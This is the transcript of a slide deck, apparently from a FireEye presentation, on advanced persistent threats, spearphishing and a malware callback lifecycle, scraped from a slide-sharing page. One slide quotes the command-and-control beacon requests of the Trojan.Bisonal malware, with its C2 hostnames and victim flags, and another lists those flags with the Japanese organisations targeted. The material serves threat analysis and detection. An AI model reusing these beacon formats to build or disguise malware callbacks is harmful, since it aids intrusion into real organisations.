Download
stopping next gen threats n.
Skip this Video
Loading SlideShow in 5 Seconds..
Stopping Next-Gen Threats PowerPoint Presentation
Download Presentation
Stopping Next-Gen Threats

Stopping Next-Gen Threats

137 Views Download Presentation
Download Presentation

Stopping Next-Gen Threats

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. Stopping Next-Gen Threats Dan Walters – Sr. Systems Engineer Mgr.

  2. "We're moving towards a world where every attack is effectively zero-day… having a signatured piece of malware, that shouldn't be the foundation on which any security model works." - Chris Young, GVP Cisco Security Tech Week Europe, September 28th 2012

  3. High Profile APT Attacks Are Increasingly Common

  4. The Attack Lifecycle – Multiple Stages Compromised Web server, or Web 2.0 site 1 Callback Server Exploitation of system 1 Malware binary download 2 File Share 2 IPS Callbacks and control established 3 File Share 1 DMZ 2 3

  5. Crimeware == for the $

  6. Advanced Persistent Threat == Human

  7. This is Alex == FireEye Research

  8. The Usual Suspects

  9. Organized…Persistent…

  10. Reconnaissance made easy…

  11. The Exploit

  12. LaserMotive

  13. CEOs are targeted

  14. Could you stop this?

  15. The Callback

  16. Hidden in plain view…

  17. Blog Post?

  18. RSS Feed?

  19. We’re Only Human

  20. HR make for easy targets

  21. Just doing my job…

  22. NATO is a frequent spearphish target

  23. Global Unrest

  24. Who’s Oil is it?

  25. The curious case of Trojan.Bisonal • Targets 100% Japanese organizations • Delivered via weaponized doc/xls files • Embeds the target name into the command and control traffic

  26. Custom “Flag” and c2 domain GET /j/news.asp?id=* HTTP/1.1 User-Agent: flag:khihost:BusinessIP:10.0.0.43 OS:XPSP3 vm:�� proxy:�� Host: online.cleansite.us Cache-Control: no-cache GET /a.asp?id=* HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: khi.acmetoy.com Connection: Keep-Alive

  27. Other “Flag”s seen • flag:410maff <-- ministry of agriculture, forestry, and fisheries • flag:1223 • Flag:712mhi <-- mitsubishi heavy industries • Flag:727x • Flag:8080 • Flag:84d • flag:boat • Flag:d2 • Flag:dick • flag:jsexe • flag:jyt • Flag:m615 • flag:toray • Flag:MARK 1 • flag:nec01 <-- nec corporation • Flag:qqq • flag:nids<-- national institute for defense studies (nids.go.jp) • flag:nsc516 <-- nippon steel corp • flag:ihi <-- ihicorp

  28. China is not the only threat

  29. Multi-Protocol, Real-Time VX Engine PHASE 1 Multi-Protocol Object Capture PHASE 2 Virtual Execution Environments • PHASE 1: WEB MPS • Aggressive Capture • Web Object Filter • PHASE 1: E-MAIL MPS • Email Attachments • URL Analysis • DYNAMIC, REAL-TIME ANALYSIS • Exploit detection • Malware binary analysis • Cross-matrix of OS/apps • Originating URL • Subsequent URLs • OS modification report • C&C protocol descriptors Map to Target OS and Applications

  30. Thank You! FireEye - Modern Malware Protection System